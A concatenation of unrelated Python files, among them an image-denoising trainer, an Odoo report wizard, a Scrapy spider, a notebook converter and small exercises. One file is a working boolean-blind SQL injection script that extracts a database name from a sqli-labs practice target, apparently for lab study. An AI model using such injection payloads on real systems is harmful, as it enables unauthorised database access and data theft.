        self.picX = sorted(rootX + name for name in os.listdir(rootX))
        self.picY = sorted(rootY + name for name in os.listdir(rootY))
        self.Len = len(self.picX)
        if not training:
            chosen = sample(range(self.Len), self.Len // 10)
            self.picX = [self.picX[i] for i in chosen]
            self.picY = [self.picY[i] for i in chosen]
            self.Len = len(chosen)

    def __getitem__(self, index):
        to_tensor = transforms.ToTensor()

        def rand_crop(src, dst):
            # Cut the same random 256x256 window from both (C,H,W) tensors.
            crop_w, crop_h = 256, 256
            x0 = randint(0, src.shape[1] - crop_w)
            y0 = randint(0, src.shape[2] - crop_h)
            return (src[:, x0:x0 + crop_w, y0:y0 + crop_h],
                    dst[:, x0:x0 + crop_w, y0:y0 + crop_h])

        imgX = Image.open(self.picX[index])
        imgY = Image.open(self.picY[index])
        return rand_crop(to_tensor(imgX), to_tensor(imgY))

    def __len__(self):
        return self.Len
def weights_init(m):
    """Initialise conv layers: weights ~ N(0, 0.01), biases zeroed.

    Intended for use with ``module.apply(weights_init)``; non-conv modules
    are left untouched.
    """
    if 'Conv' in m.__class__.__name__:
        m.weight.data.normal_(mean=0.0, std=0.01)
        m.bias.data.fill_(0)
# Paired moire/clean training data; the test split reuses the same folders
# with a random 10% subset (see MoirePic(training=False)).
dataset = MoirePic("/data_new/moire/trainData/source/",
                   "/data_new/moire/trainData/target/")
testdataset = MoirePic("/data_new/moire/trainData/source/",
                       "/data_new/moire/trainData/target/", False)
use_gpu = torch.cuda.is_available()
batch_size = 8
kwargs = {'num_workers': 14, 'pin_memory': True}
train_loader = DataLoader(dataset=dataset, shuffle=True,
                          batch_size=batch_size, **kwargs)
test_loader = DataLoader(dataset=testdataset, shuffle=True,
                         batch_size=batch_size, **kwargs)
# Resume training from the saved checkpoint rather than starting fresh.
# model = MoireCNN()
model = torch.load("moire-1.pth")
# model.apply(weights_init)
# with SummaryWriter(comment='MoireCNN') as w:
#     w.add_graph(model, (x, ))
if use_gpu:
    model = model.cuda()
    # model = nn.DataParallel(model)
    print('USE GPU')
else:
    print('USE CPU')
criterion = nn.MSELoss()
lr = 0.00004
# Seeds for the lr-decay / best-checkpoint logic in test().
pre_loss = 100.0
best_loss = 100.0
for epoch in range(100):
    train(epoch, lr)
    test(epoch)
import os
import sys
import json
from copy import deepcopy
import __main__
import textwrap
from types import ModuleType
from typing import TextIO, Dict, Any, Generator, List
from herzog.parser import parse_cells, CellType, JUPYTER_SHELL_PFX, JUPYTER_MAGIC_PFX
class Cell:
    """No-op context manager marking a herzog cell of the given type."""

    def __init__(self, cell_type):
        # Raises KeyError for cell type names not defined in CellType.
        self.cell_type = CellType[cell_type]

    def __enter__(self):
        return self

    def __exit__(self, *args, **kwargs):
        return None
class Sandbox:
    """Snapshot ``__main__``'s globals on entry and restore them on exit.

    Module objects are tracked separately because they cannot be usefully
    deep-copied; everything else is deep-copied so mutations inside the
    sandbox do not leak out.
    """

    def __init__(self):
        self._state = None
        self._state_modules = None

    def __enter__(self):
        plain = {}
        modules = {}
        for name, value in __main__.__dict__.items():
            if isinstance(value, ModuleType):
                modules[name] = value
            else:
                plain[name] = value
        self._state = deepcopy(plain)
        self._state_modules = modules
        return self

    def __exit__(self, *args, **kwargs):
        # NOTE: deliberately a no-op when the snapshot is empty/None.
        if self._state:
            __main__.__dict__.update(self._state)
            for key in __main__.__dict__.copy():
                if key not in self._state:
                    del __main__.__dict__[key]
            __main__.__dict__.update(self._state_modules)
def load_ipynb_cells(ipynb: TextIO) -> List[Dict[Any, Any]]:
    """Return the 'cells' list from an open .ipynb file handle.

    Prints a hint to stderr and re-raises when the handle does not contain
    valid notebook JSON with a 'cells' key.
    """
    try:
        notebook = json.loads(ipynb.read())
        return notebook['cells']
    except (json.JSONDecodeError, KeyError):
        print(f"Check that '{ipynb}' is a valid ipynb file.", file=sys.stderr)
        raise
def translate_to_ipynb(herzog_handle: TextIO) -> Dict[str, Any]:
    """Convert a herzog-formatted Python file into an ipynb notebook dict.

    Cells without an ipynb representation are dropped; notebook metadata is
    taken from the bundled python_3_boiler.json.
    """
    cells = []
    for parsed in parse_cells(herzog_handle):
        if parsed.has_ipynb_representation:
            cells.append(parsed.to_ipynb_cell())
    boiler_path = os.path.join(os.path.dirname(__file__), "data", "python_3_boiler.json")
    with open(boiler_path) as fh:
        boiler = json.loads(fh.read())
    return dict(cells=cells, **boiler)
def translate_to_herzog(ipynb_handle: TextIO, indent: int = 4) -> Generator[str, None, None]:
    """Yield herzog-formatted Python source lines for an ipynb file handle.

    Markdown cells become ``with herzog.Cell("markdown"):`` blocks holding a
    triple-quoted string; code cells become ``with herzog.Cell('python'):``
    blocks with Jupyter ``%`` magics / ``!`` shell lines rewritten using the
    herzog prefix constants. Unsupported cell types are emitted commented
    out, preceded by a warning.

    :param ipynb_handle: open handle on a .ipynb JSON document.
    :param indent: number of spaces used to indent cell bodies.
    """
    cells = load_ipynb_cells(ipynb_handle)
    prefix = " " * indent
    yield "import herzog\n\n"
    for cell in cells:
        # Notebook 'source' may be either a string or a list of lines.
        if isinstance(cell.get('source', None), list):
            cell['source'] = "".join(cell['source'])
        if cell['cell_type'] == "markdown":
            s = '\nwith herzog.Cell("markdown"):\n """\n'
            s += textwrap.indent(cell['source'], prefix=prefix).rstrip()
            s += '\n """\n'
            for line in s.split("\n"):
                yield line + "\n"
        elif cell['cell_type'] == "code":
            s = "\nwith herzog.Cell('python'):\n"
            s += textwrap.indent(cell['source'], prefix=prefix).rstrip()
            for line in s.split("\n"):
                if line.startswith("%"):
                    yield line.replace("%", JUPYTER_MAGIC_PFX, 1) + "\n"
                elif line.startswith("!"):
                    yield line.replace("!", JUPYTER_SHELL_PFX, 1) + "\n"
                else:
                    yield line + "\n"
        else:
            print(f"cell_type not implemented yet: {cell['cell_type']}", file=sys.stderr)
            # warn the user and add, but comment out
            yield "\n"
            yield "## .ipynb -> Herzog translation failed:\n"
            yield f"## Cell type '{cell['source']}' not supported by Herzog. " \
                  f"Supported cell types are {CellType._member_names_}\n"
            yield f"# with herzog.Cell('{cell['cell_type']}'):\n"
            s = textwrap.indent(cell['source'], prefix=prefix).rstrip() + "\n"
            for line in s.split("\n"):
                yield f"# {line}\n"
|
def fibonacci():
    """Yield the Fibonacci numbers 0, 1, 1, 2, 3, ... indefinitely."""
    current, following = 0, 1
    while True:
        yield current
        current, following = following, current + following
# Print Fibonacci numbers, stopping after the first value above 100.
for fib in fibonacci():
    print(fib)
    if fib > 100:
        break
|
import threading
import time
def test1():
    """Worker body: print a heartbeat line once a second, five times."""
    for tick in range(5):
        print("--------test1-------%d--------" % tick)
        time.sleep(1)
def main():
    """Demonstrate thread creation: enumerate() before, during and after start."""
    print(threading.enumerate())
    # Pointing a thread at a target function is the convenient form.
    # For more complex targets you can instead subclass threading.Thread,
    # create an instance of that class and call the inherited start() method,
    # which automatically invokes the subclass's run() method first.
    # Note: it must be run(); other methods of the class can be called from
    # within run() to reach the rest of its behaviour.
    # 1. t = MyThread()
    # 2. t.start()
    t1 = threading.Thread(target=test1)
    print(threading.enumerate())
    t1.start()
    print(threading.enumerate())  # inspect the current set of live threads
# Run the demo only when executed directly.
if __name__ == "__main__":
    main()
import sys
# Competitive-programming style: the first stdin line is the test-case
# count; each following line is a number that is scaled by 4 and fed into a
# closed-form expression (a = v^(1/3), x = a^2 * sqrt(3)). The underlying
# derivation is not recoverable from this snippet — presumably a geometry
# optimisation answer; verify against the problem statement.
for _ in [0]*int(sys.stdin.readline().strip()):
    v=4*float(sys.stdin.readline().strip())
    a=pow(v,0.3333333333333333)
    x=a*a*1.7320508075688772  # 1.7320508... == sqrt(3)
    print("%.10f"%((x/2)+(3*a*(v/x))))
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
import xlwt
import base64
from io import StringIO
from odoo import api, fields, models, _
import platform
class PurchaseReportOut(models.Model):
    # Holder record for the generated report files that the wizard shows
    # back to the user for download.
    _name = 'expense.report.out'
    _description = 'expense order report'

    purchase_data = fields.Char('Name', size=256)  # XLS file name
    file_name = fields.Binary('Purchase Excel Report', readonly=True)  # XLS payload (base64)
    purchase_work = fields.Char('Name', size=256)  # CSV file name
    file_names = fields.Binary('Purchase CSV Report', readonly=True)  # CSV payload (base64)
class WizardWizards(models.Model):
    _name = 'wizard.reportes'
    _description = 'purchase wizard'

    # purchase order excel report button actions
    @api.multi
    def action_purchase_report(self):
        """Build an XLS payment sheet plus a CSV export for the selected
        hr.expense.sheet records, then open a form exposing both files.

        NOTE(review): despite the 'purchase' naming throughout, the records
        browsed are hr.expense.sheet — confirm which model this targets.
        """
        # XLS report
        custom_value = {}
        # Bank payment file column headers (used for the CSV label row).
        label_lists = ['Tipo Documento Beneficiario', 'Nit Beneficiario', 'Nombre Beneficiario', 'Tipo Transaccion', 'Codigo Banco', 'No Cuenta Beneficiario', 'Email', 'Documento Autorizado', 'Referencia',
                      'OficinaEntrega', 'ValorTransaccion', 'Fecha de aplicación']
        order = self.env['hr.expense.sheet'].browse(self._context.get('active_ids', list()))
        #ordershet = self.env['hr.expense.sheet'].browse(self._context.get('active_ids', list()))
        workbook = xlwt.Workbook()
        for obj in order:
            purchase = []
            for lines in obj:
                product = {}
                product['origin'] = lines.origin.name
                product['default_code'] = lines.default_code
                purchase.append(product)
            custom_value['products'] = purchase
            # NOTE(review): 'lines' leaks from the loop above, so these
            # header values come from the last iterated record.
            custom_value['origin'] = lines.origin.name
            custom_value['default_code'] = obj.default_code
            custom_value['user_id'] = obj.name
            custom_value['company_id'] = obj.company_id.vat
        # Cell styles for the XLS sheet.
        style0 = xlwt.easyxf(
            'font: name Times New Roman bold on;borders:left thin, right thin, top thin, bottom thin;align: horiz right;',
            num_format_str='#,##0.00')
        style1 = xlwt.easyxf(
            'font: name Times New Roman bold on;borders:left thin, right thin, top thin, bottom thin;align: horiz left;',
            num_format_str='#,##0.00')
        style2 = xlwt.easyxf('font:height 250,bold True;borders:left thin, right thin, top thin, bottom thin;', num_format_str='#,##0.00')
        style5 = xlwt.easyxf(
            'font: name Times New Roman bold on;borders:left thin, right thin, top thin, bottom thin;align: horiz center;',
            num_format_str='#,##0')
        style6 = xlwt.easyxf(
            'font: name Times New Roman bold on;borders:left thin, right thin, top thin, bottom thin;',
            num_format_str='#,##0.00')
        sheet = workbook.add_sheet("objname")
        #sheet = workbook.add_sheet(rec.name)
        # Payer header block on row 0.
        sheet.write(0, 0, 'NIT PAGADOR', style1)
        sheet.write(0, 1, 'TIPO DE PAGO', style1)
        sheet.write(0, 2, 'APLICACIÓN', style1)
        sheet.write(0, 3, 'SECUENCIA DE ENVÍO', style1)
        sheet.write(0, 4, 'NRO CUENTA A DEBITAR', style1)
        sheet.write(0, 5, 'TIPO DE CUENTA A DEBITAR', style1)
        sheet.write(0, 6, 'DESCRIPCÓN DEL PAGO', style1)
        # Beneficiary column headers on row 2.
        sheet.write(2, 0, 'Tipo Documento Beneficiario', style1)
        sheet.write(2, 1, 'Nit Beneficiario', style1)
        sheet.write(2, 2, 'Nombre Beneficiario', style1)
        sheet.write(2, 3, 'Tipo Transaccion', style1)
        sheet.write(2, 4, 'Código Banco', style1)
        sheet.write(2, 5, 'No Cuenta Beneficiario', style1)
        sheet.write(2, 6, 'Email', style1)
        sheet.write(2, 7, 'Documento Autorizado', style1)
        sheet.write(2, 8, 'Referencia', style1)
        sheet.write(2, 9, 'OficinaEntrega', style1)
        sheet.write(2, 10,'ValorTransaccion', style1)
        sheet.write(2, 11,'Fecha de aplicación', style1)
        #i=4
        #for n in custom_value['products']:
        #    i=i+1
        #    sheet.write(i, 3, n['origin'], style6)
        #    sheet.write(i, 4, n['default_code'], style0)
        #    n += 1
        # Data rows start at row 11; i is a 1-based sequence number.
        n = 11; m=10; i = 1
        for product in custom_value['products']:
            sheet.write(n, 1, i, style5)
            sheet.write_merge(n, n, 2, 3, product['origin'], style6)
            sheet.write_merge(n, n, 4, 5, product['default_code'], style0)
            n += 1; m +=1; i += 1
        #n = 11; m=10; i = 1
        #for product in custom_value['products']:
        #    sheet.write_merge(n, n, 2, 3, product['origin'], style6)
        #sheet.write(3, 1, product['default_code'], style0)
        # CSV report
        datas = []
        for values in order:
            for value in values:
                if value:
                    item = [
                        str(value.categ_id.name or ''),
                        str(value.origin.name or ''),
                        str(value.applicant.name or ''),
                        str(value.company_id.name or ''),
                    ]
                    datas.append(item)
        output = StringIO()
        label = ','.join(label_lists)
        output.write(label)
        output.write("\n")
        for data in datas:
            record = ';'.join(data)
            output.write(record)
            output.write("\n")
        data = base64.b64encode(bytes(output.getvalue(),"utf-8"))
        # Save the workbook to a temp path on POSIX, or the cwd elsewhere.
        if platform.system() == 'Linux':
            filename = ('/tmp/Purchase Report' + '.xls')
        else:
            filename = ('Purchase Report' + '.xls')
        workbook.save(filename)
        fp = open(filename, "rb")
        file_data = fp.read()
        # NOTE(review): base64.encodestring was removed in Python 3.9;
        # encodebytes is the modern spelling — confirm the runtime version.
        out = base64.encodestring(file_data)
        # Files actions
        attach_vals = {
            'purchase_data': 'Purchase Report'+ '.xls',
            'file_name': out,
            'purchase_work':'Purchase'+ '.csv',
            'file_names':data,
        }
        act_id = self.env['expense.report.out'].create(attach_vals)
        fp.close()
        # Open the generated record in a modal form for download.
        return {
            'type': 'ir.actions.act_window',
            'res_model': 'expense.report.out',
            'res_id': act_id.id,
            'view_type': 'form',
            'view_mode': 'form',
            'context': self.env.context,
            'target': 'new',
        }
|
#!/usr/bin/python
# -*-coding:Utf-8 -*
##########################################################
"""
Exceptions for the SOLIDServer modules
"""
# Public API of this exceptions module.
__all__ = ["SDSError",
           "SDSInitError",
           "SDSServiceError",
           "SDSRequestError"]
class SDSError(Exception):
    """Generic base class for any exception in SOLIDServer communication.

    Catching this type catches every error defined in this module.
    """
    pass
class SDSInitError(SDSError):
    """Raised when an action is attempted on a non-initialized SDS connection."""
    pass
class SDSServiceError(SDSError):
    """Raised when an unknown service is requested.

    :ivar service: the name of the unknown service.
    """
    def __init__(self, service_name):
        # Fix: forward a message to the base Exception so str(exc) and
        # exc.args carry the service name instead of being empty.
        super(SDSServiceError, self).__init__(
            "unknown service: {}".format(service_name))
        self.service = service_name
class SDSRequestError(SDSError):
    """Raised when the underlying urllib request fails.

    :ivar method: HTTP method of the failed request.
    :ivar url: target URL.
    :ivar headers: request headers that were sent.
    """
    def __init__(self, method, url, headers):
        # Fix: forward a message to the base Exception so str(exc) and
        # exc.args describe the failed request instead of being empty.
        super(SDSRequestError, self).__init__(
            "request failure: {} {}".format(method, url))
        self.method = method
        self.url = url
        self.headers = headers
|
from django.contrib import admin
from django.urls import include, path
from django.conf.urls.static import static
from django.conf import settings
from django.views.decorators.csrf import csrf_exempt
from blog.views import AboutView, handler404, handler500
from write_blog.views import image_upload
# Project URL routes: admin, auth/registration, profiles, editor assets and
# the blog app mounted at the site root.
urlpatterns = [
    path('admin/', admin.site.urls),
    path('user/', include('registration.urls')),
    path('profile/', include('user_profile.urls')),
    path('tinymce/', include('tinymce.urls')),
    path('accounts/', include('allauth.urls')),
    # CSRF-exempt endpoint for the editor's image uploads.
    path('media/images/uploads/', csrf_exempt(image_upload)),
    path('', include('blog.urls')),
]
# Serve uploaded media and collected static files (a development
# convenience; in production the web server should serve these).
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
# Re-export the blog app's custom error views under the names Django expects.
handler404 = handler404
handler500 = handler500
|
#!/usr/bin/python
import httplib
import sys
import threading
import time
import urlparse
import urllib
from collections import OrderedDict
from os import _exit,system
def connect(host, port, verb, path, query, data=None, headers=None):
    """Send an HTTP request and return the raw response body. (Python 2)

    :param host: target host name.
    :param port: target port (int or numeric string).
    :param verb: HTTP method to use.
    :param path: request path; *query* is urlencoded and appended to it.
    :param query: mapping of query-string parameters.
    :param data: optional request body.
    :param headers: optional dict of request headers.
    """
    # Fixes: the original ignored verb/data/headers and always issued a bare
    # GET, and used a shared mutable default ({}) for headers.
    path = path + '?' + urllib.urlencode(query)
    conn = httplib.HTTPConnection(host, int(port))
    conn.request(verb, path, data if data is not None else "", headers if headers is not None else {})
    return conn.getresponse().read()
def request(url):
    """Parse *url* and stash its parts as attributes ON THE FUNCTION OBJECT.

    Returns the function itself, which the caller reads as a pseudo
    namespace (parser.host / .port / .query / .path).
    NOTE(review): state on the function object is effectively global —
    concurrent callers would clobber each other; a namedtuple would be safer.
    """
    parser = urlparse.urlparse(url)
    request.host = parser.netloc.split(':')[0]
    # NOTE(review): 'http' in scheme also matches https, so an explicit port
    # is never honoured for http(s) URLs — confirm this is intended.
    request.port = 80 if 'http' in parser.scheme else parser.netloc.split(':')[1]
    request.query = OrderedDict(urlparse.parse_qsl(parser.query))
    request.path = parser.path
    return request
def inject(url,vuln_param=None,prefix=None,suffix=None,verb=None):
    """Boolean-blind SQL injection: recover the database name bit by bit. (Python 2)

    For each of the first 8 characters (x) and bits 2..8 of each character
    (y), a payload probes one bit of the character's binary form; the truth
    of the probe is read from the page content (presence of *tc*).
    NOTE(review): *prefix* and *suffix* are accepted but never used.
    """
    parser = request(url)
    verb = verb if verb else "GET"
    tc = 'You are in...........';  # marker text present on a TRUE response
    rc = 0  # request counter
    val = ""  # recovered database name so far
    for x in range(1,9):
        b = '0'  # pad bit; probed bits 2..8 are appended below
        for y in range(2,9):
            payload = " 1' AND (select mid((lpad(bin(ascii(mid((select database()),%d,1))),8,0)),%d,1)) AND '1'='1" %(x,y)
            if vuln_param in parser.query.keys():
                parser.query[vuln_param] = payload
            else:
                _exit(1)  # the vulnerable parameter is missing: abort hard
            st = time.time()
            rc += 1
            response = connect(parser.host,parser.port,verb,parser.path,parser.query)
            et = int(time.time() - st)
            if et >= 1:
                # A slow response is treated as a failed probe for this char.
                break
            else:
                if tc in response:
                    # print 'found'
                    b += '1'
                else:
                    b += '0'
        system('cls')  # Windows clear-screen between characters
        print b
        val += chr(int(b,2))
        print "Database Name : {0}".format(val),
        sys.stdout.flush()
    print "\n[+] No of requests %d" %rc
# Entry point: extract the database name via the injectable 'id' parameter.
inject("http://localhost/sqli/Less-8/index.php?id=1",vuln_param="id")
#!/usr/bin/env python
import jinja2
import mimetypes
import numpy as np
import os
import smtplib
import sys
import getpass
import email
import email.utils
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
# CLI: ./send-invitations.py pc_invitees.csv pc_invitation.txt.in
if len(sys.argv) < 3:
    print('Usage: ./send-invitations.py pc_invitees.csv pc_invitation.txt.in')
    # NOTE(review): there is no sys.exit() here — the script falls through
    # and then crashes on sys.argv[2]; confirm whether an exit is wanted.
with open(sys.argv[2], 'r') as fp:
    email_template = fp.read()
template = jinja2.Template(email_template)
# CSV rows of (name, email, space-separated expertise codes).
pc_invitees = np.loadtxt(sys.argv[1],
                         delimiter=',',
                         dtype={'names': ('invitee', 'email','fields'),
                                'formats': ('S128', 'S128', 'S128')})
# Expertise code -> human-readable description.
expertise_name_map = {
    'cs': 'scientific computing with python',
    'edu': 'scientific computing education',
    'geo': 'geophysics',
    'gis': 'geospatial data',
    'gissci': 'geospatial data in science',
    'astro': 'astronomy and astrophysics',
    'viz': 'visualization',
    'soc': 'computational social sciences',
    'bioinfo': 'bioinformatics',
    'eng': 'engineering'}
def get_fields(fields):
    """Translate space-separated expertise codes into prose.

    Returns (field_description, "is"/"are") for one or two codes; raises
    Exception for more than two.
    """
    codes = fields.split(" ")
    if len(codes) == 1:
        return expertise_name_map[codes[0]], "is"
    if len(codes) == 2:
        joined = expertise_name_map[codes[0]] + " and " + expertise_name_map[codes[1]]
        return joined, "are"
    raise Exception("Too many fields in" + fields)
# Gmail SMTP session (password prompted interactively at runtime).
username = 'katyhuff@gmail.com'
password = getpass.getpass('password:')
server = smtplib.SMTP('smtp.gmail.com:587')
server.starttls()
server.login(username, password)
# Render and send one invitation per program-committee candidate.
for member in pc_invitees:
    fieldstr, is_are_str = get_fields(member['fields'])
    email_body = template.render(name=member['invitee'],
                                 expertise=fieldstr,
                                 isare=is_are_str)
    msg = MIMEMultipart('alternative')
    msg['Subject'] = 'Invitation to SciPy2014 Program Committee'
    msg['From'] = 'Katy Huff <katyhuff@gmail.com>'
    msg['To'] = member['email']
    msg['Cc'] = 'Serge Rey <sjsrey@gmail.com>,'
    msg['Date'] = email.utils.formatdate()
    msg.attach(MIMEText(email_body, 'plain'))
    # The envelope recipients: the Cc address plus every To address.
    from_address = 'Katy Huff <katyhuff@gmail.com>'
    to_address = ['Serge Rey <sjsrey@gmail.com>']
    to_address.extend([em.strip() for em in member['email'].split(',')])
    print(email_body)
    server.sendmail(from_address, to_address, msg.as_string())
|
def countUnvisited(n, m):
    """Count values reachable from m*n - m - n by repeatedly subtracting m or n.

    Runs a BFS from start = m*n - m - n, following start - m and start - n
    while they stay positive, and counts each distinct value visited
    (including the start itself).

    :param n: first step size.
    :param m: second step size.
    :return: number of distinct reachable values.
    """
    start = (m * n) - m - n
    # Fixes: the local 'set' no longer shadows the builtin, and the O(n)
    # queue.remove(queue[0]) is replaced by an index cursor (amortised O(1)).
    queue = [start]
    visited = {start}
    count = 0
    head = 0
    while head < len(queue):
        curr = queue[head]
        head += 1
        count += 1
        for nxt in (curr - m, curr - n):
            if nxt > 0 and nxt not in visited:
                queue.append(nxt)
                visited.add(nxt)
    return count
if __name__ == '__main__':
    # Read t test cases of (n, m) from stdin and print the count for each.
    t = int(input('Enter the number of test cases:- '))
    for _ in range(t):
        arr = list(map(int, input('Enter the value of n and m:- ').strip().split()))
        n = arr[0]
        m = arr[1]
        print(countUnvisited(n, m))
from player import Player
from playerprovider import PlayerProvider
class BettingGame:
    """A base class for betting games to inherit from.

    Handles collecting/paying out bets and running rounds.

    Base functionality:
    collectBet -- interactively asks a player for a wager and records it.
    payBet -- pays a winning bet back to the player using a decimal multiplier.

    Subclasses must implement:
    initializeGame -- one-time setup (deck, players, ...); called from __init__.
    runRound -- play one round; called repeatedly until endGame() is invoked.
    """

    players = []

    # --- methods subclasses must override --------------------------------
    def initializeGame(self):
        raise NotImplementedError("Method 'initializeGame' not implemented")

    def runRound(self):
        raise NotImplementedError("Method 'runRound' not implemented")

    # --- base functionality ----------------------------------------------
    def collectBet(self, player):
        wager = int(input("How much would you like to bet?"))
        self.roundBets.append(Bet(player, wager))
        print("{name} has wagered {amount}.".format(
            name=player.displayName, amount=wager))

    def payBet(self, bet, multiplier):
        # Return the original stake plus winnings (stake * multiplier).
        winnings = bet.amount + (bet.amount * multiplier)
        bet.player.bank += winnings
        print("{name} has won {amount}.".format(
            name=bet.player.displayName, amount=winnings))

    def endGame(self):
        self.ended = True

    def run(self):
        print("Beginning game.")
        while not self.ended:
            self.roundBets = []
            self.runRound()
        print("Thanks for playing.")

    def __init__(self, playerProvider):
        self.playerProvider = playerProvider
        self.ended = False
        self.initializeGame()
class Bet:
    """A single wager: which player placed it and for how much."""

    def __init__(self, player, amount):
        # Store the wager exactly as given; payout logic lives in the game.
        self.amount = amount
        self.player = player
|
from selenium.webdriver.common.by import By
class Purchase_page:
    """Page object for the purchase/confirmation page.

    Holds the element locators as class attributes and exposes one lookup
    method per element.  Note: each method only *locates* and returns the
    element — the caller performs the actual click/typing.
    """

    country = (By.ID, "country")
    checkbox = (By.CSS_SELECTOR, "label[for='checkbox2']")
    confirm_button = (By.CSS_SELECTOR, "input[class*='btn-success']")
    success_message = (By.CSS_SELECTOR, "div[class *='alert-success']")

    def __init__(self, driver):
        self.driver = driver

    def _find(self, locator):
        # Single lookup helper so every accessor stays a one-liner.
        return self.driver.find_element(*locator)

    def enter_country(self):
        return self._find(Purchase_page.country)

    def click_checkbox(self):
        return self._find(Purchase_page.checkbox)

    def click_confirm(self):
        return self._find(Purchase_page.confirm_button)

    def grab_success_message(self):
        return self._find(Purchase_page.success_message)
import logging
from datetime import date, timedelta
from urllib import parse
import scrapy
# Route all log output (DEBUG and above) from this spider run to a local file.
logging.basicConfig(filename='eska.log', level=logging.DEBUG)
def initialize_start_urls():
    """Build one archive-playlist URL per day, 2010-09-01 through today.

    Returns a list of URLs of the form
    'http://www.eskarock.pl/archiwum_playlist/YYYY-MM-DD'.
    """
    BASE_URL = 'http://www.eskarock.pl/archiwum_playlist/'
    first_day = date(2010, 9, 1)
    last_day = date.today()
    # Inclusive span; the comprehension is empty if today somehow precedes
    # the first archive day, matching the original while-loop behaviour.
    total_days = (last_day - first_day).days + 1
    return [
        BASE_URL + (first_day + timedelta(days=offset)).isoformat()
        for offset in range(total_days)
    ]
class EskaSpider(scrapy.Spider):
    """Scrape the Eska Rock playlist archive, one request per archive day.

    Each daily page yields dicts with title/artist/date_played/time_played.
    When a playlist row has no artist, the song's author page is fetched
    and parse_author_page fills the field in before yielding.
    """
    name = 'eska'
    start_urls = initialize_start_urls()
    # start_urls = [
    #     'http://www.eskarock.pl/archiwum_playlist/2018-10-25',
    # ]
    def parse(self, response):
        """Parse one daily playlist page into song dicts or author-page requests."""
        # The archive URL ends with the ISO date, e.g. .../2018-10-25.
        date_played = response.url.split('/')[-1]
        for li in response.xpath('//div[@id="box-zagrane"]/ul//li'):
            title_band = li.xpath('div[@class="txt"]/div[@class="song"]/a')
            # The title attribute carries a 'utwór ' ("track ") prefix — strip it.
            # NOTE(review): re_first returns None when the pattern is absent,
            # which would make .replace raise AttributeError — confirm the
            # anchor always has a title attribute.
            title = title_band.re_first(r'title="(.+?)"').replace('utwór ', '')
            artist = li.xpath(
                'div[@class="txt"]/div[@class="author"]/text()').extract_first(default='BRAK!')
            # extract_first() here returns the raw '<b>...</b>' markup, so the
            # tags are stripped manually.
            # NOTE(review): no default= is supplied, so a missing node would
            # return None and .replace would raise — verify every row has a time.
            time_played = li.xpath(
                'div[@class="when"]/b').extract_first().replace('<b>', '').replace('</b>', '')
            song_data = {
                'title': title,
                'artist': artist,
                'date_played': date_played,
                'time_played': time_played
            }
            author_page = title_band.re_first(r'href="(.+?)"')
            if artist == 'BRAK!':
                # Artist missing ('BRAK!' is the sentinel default above):
                # fetch the author page to recover it.  dont_filter=True lets
                # scrapy revisit the same author page for multiple songs.
                request = scrapy.Request(
                    author_page, callback=self.parse_author_page, dont_filter=True)
                request.meta['song_data'] = song_data
                yield request
            else:
                yield song_data
    def parse_author_page(self, response):
        """Fill in the artist name from the author page, then emit the song dict."""
        artist = response.xpath(
            '//h1[contains(@class, "main-title")]/span/text()').extract_first()
        song_data = response.meta['song_data']
        # NOTE(review): extract_first() may return None here too, in which
        # case .strip() raises — confirm the author page always has this header.
        song_data['artist'] = artist.strip()
        yield song_data
    # def make_title_url_like(self, title):
    #     polish = list('ąęćęłóśżźĄĘĆĘŁÓŚ')
    #     _ascii = list('aeceloszz')
    #     for old, new in zip(polish, _ascii + _ascii):
    #         title = title.replace(old, new)
    #         title = title.replace(' ', '_')
    #     return parse.quote(title)
|
import unittest
def remove_duplicates(s: str) -> str:
    """Return *s* with repeated characters removed, keeping first occurrences.

    >>> remove_duplicates("aabbcc")
    'abc'
    """
    # dict preserves insertion order (guaranteed since Python 3.7), so
    # dict.fromkeys keeps the first occurrence of each character in O(n),
    # replacing the previous O(n^2) list-membership scan.
    return "".join(dict.fromkeys(s))
class TestCase(unittest.TestCase):
    """Unit tests for remove_duplicates covering the main input classes."""

    def test_case1(self):
        # All-unique input is returned unchanged.
        observed = remove_duplicates("abcd")
        self.assertEqual(observed, "abcd")

    def test_case2(self):
        # A single repeated character collapses to one occurrence.
        observed = remove_duplicates("aaaa")
        self.assertEqual(observed, "a")

    def test_case3(self):
        # The empty string is a no-op.
        observed = remove_duplicates("")
        self.assertEqual(observed, "")

    def test_case4(self):
        # Duplicate pairs each collapse, original order preserved.
        observed = remove_duplicates("aabbcc")
        self.assertEqual(observed, "abc")
if __name__ == "__main__":
unittest.main()
|
from itertools import islice
from io import open
from conllu import parse_incr
import pandas as pd
import numpy as np
from collections import Counter
import string
import math
#for deep copy
import copy
#for commandline input
import sys
#for precision and recall
from sklearn.metrics import precision_score
from sklearn.metrics import recall_score
"""
#for debugging
import warnings
import traceback
def warn_with_traceback(message, category, filename, lineno, file=None, line=None):
log = file if hasattr(file,'write') else sys.stderr
traceback.print_stack(file=log)
log.write(warnings.formatwarning(message, category, filename, lineno, line))
warnings.showwarning = warn_with_traceback
warnings.simplefilter("always")
"""
##### STILL NEED TO REMOVE OOV CUTOFF MAYBE
def bigramLaplace(pathToTrainLang1, pathToTrainLang2, pathToTrainLang3, pathToTrainLang4, pathToTrainLang5, pathToTrainLang6
, pathToTuneLang1, pathToTuneLang2, pathToTuneLang3, pathToTuneLang4, pathToTuneLang5, pathToTuneLang6, uniBackoff= .5, biBackoff= .5):
#not error checking the input. presume user inputs correct values below 1 and above 0
uniBackoff = float(uniBackoff)
biBackoff = float(biBackoff)
#removed oov constant implementation
#I am populating some unknown token list with a minimal training set of tokens with frequency one.
#This is because having no probability for unknown tokens is bad form in my opinion and this distributes at least a small probability to <UNK>
#if int(oovConstant)>=1:
# oovFrequency = int(oovConstant)
#else:
# oovFrequency = 1
#get laplace constant from hyperparamters. cannot be 0 or less. should probably be less than 1 for better performance
#if float(laplaceConstant)> 0:
# laplace = float (laplaceConstant)
#else:
# laplace = .1
#open both files
train1 = open(pathToTrainLang1, "r", encoding="utf-8")
train2 = open(pathToTrainLang2, "r", encoding="utf-8")
train3 = open(pathToTrainLang3, "r", encoding="utf-8")
train4= open(pathToTrainLang4, "r", encoding="utf-8")
train5 = open(pathToTrainLang5, "r", encoding="utf-8")
train6 = open(pathToTrainLang6, "r", encoding="utf-8")
#used as temporary storage per each sentence as the connlu parser iterates over them
tempSentence = list()
#list for storing word tokens
list1 = list()
list2 = list()
